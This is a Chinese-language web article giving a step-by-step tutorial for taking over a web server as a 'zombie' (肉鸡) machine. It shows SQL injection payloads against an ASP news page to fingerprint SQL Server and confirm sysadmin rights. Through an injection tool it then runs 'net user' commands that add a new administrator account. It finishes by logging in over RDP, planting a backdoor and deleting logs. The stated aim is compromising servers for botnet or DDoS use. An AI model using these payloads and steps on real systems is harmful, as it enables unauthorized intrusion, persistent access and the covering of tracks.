网络安全

位置:IT落伍者 >> 网络安全 >> 浏览文章

按部就班 捕获肉鸡


发布日期:2021年12月08日
 
按部就班 捕获肉鸡

即使捕获了菜鸟的肉鸡,质量也往往比较差,最多也可以做DDoS肉鸡。笔者建议,如果用来学习操作或者研究,还是捕获服务器肉鸡比较好,因为它稳定、24小时在线、速度快……优点数不胜数。下面笔者就带大家对一个站点进行测试。本文旨在抛砖引玉,希望与大家进行技术交流。1.例如http://xxx.cn/news.asp?newsid=1289为我们要测试的地方(为了不必要的麻烦,地址用xxx来代替)。检测注入漏洞是在网址后输入“AND 1=1”正常页面或“AND 1=2”不正常页面。发现漏洞的过程我想大家都知道,这里就不多说了。2.接着我们来判断数据库的类型。在地址后面输入:and (select count(*) from sysobjects)>0 也就是:http://xxx.cn/news.asp?newsid=1289 and (select count(*) from sysobjects)>0。3.从图1中可以看到页面正常返回!接着在地址上输入:and (select count(*) from msysobjects)>0。我们来看一下返回的情况,如图2所示。

4.这样,我们可以判断,该数据库是SQL Server。下面,在地址后面输入这条命令:http://xxx.cn/news.asp?newsid=1289 and 1=(SELECT%20IS_SRVROLEMEMBER('sysadmin'))。Tw.WinGWit.CoM5.这是判断读写权限,页面正常返回,如图3所示。晕,居然是SA权限。拿出NB 联盟注入工具来测试吧。操作比输入代码要简单,也比较易懂。

6.在注入地址里填上要注入的地址,在下面的DOS 命令中输入“net user”查询账户(图4)。

7.接着,输入“net user hsmw hsmw / add”添加 一个名字为 “hsmw”的账号(图5),再输入“net localgroup administrators hsmw /add”把刚刚添加的hsmw 这个账号(图6),提升为管理员权限。

8.来看添加的效果。输入“net user”,我们可以看到,多了一个 hsmw的 账号。这说明添加账号成功了(图7)。

9.再进行简单的扫描,看看开了3389端口没有。太“不幸”了,居然开了3389。哈哈,直接用我们刚刚添加的账号登录,然后留后门并删除日志。撤!

上一篇:误打误撞我也“黑”了一把

下一篇:本地连接受限制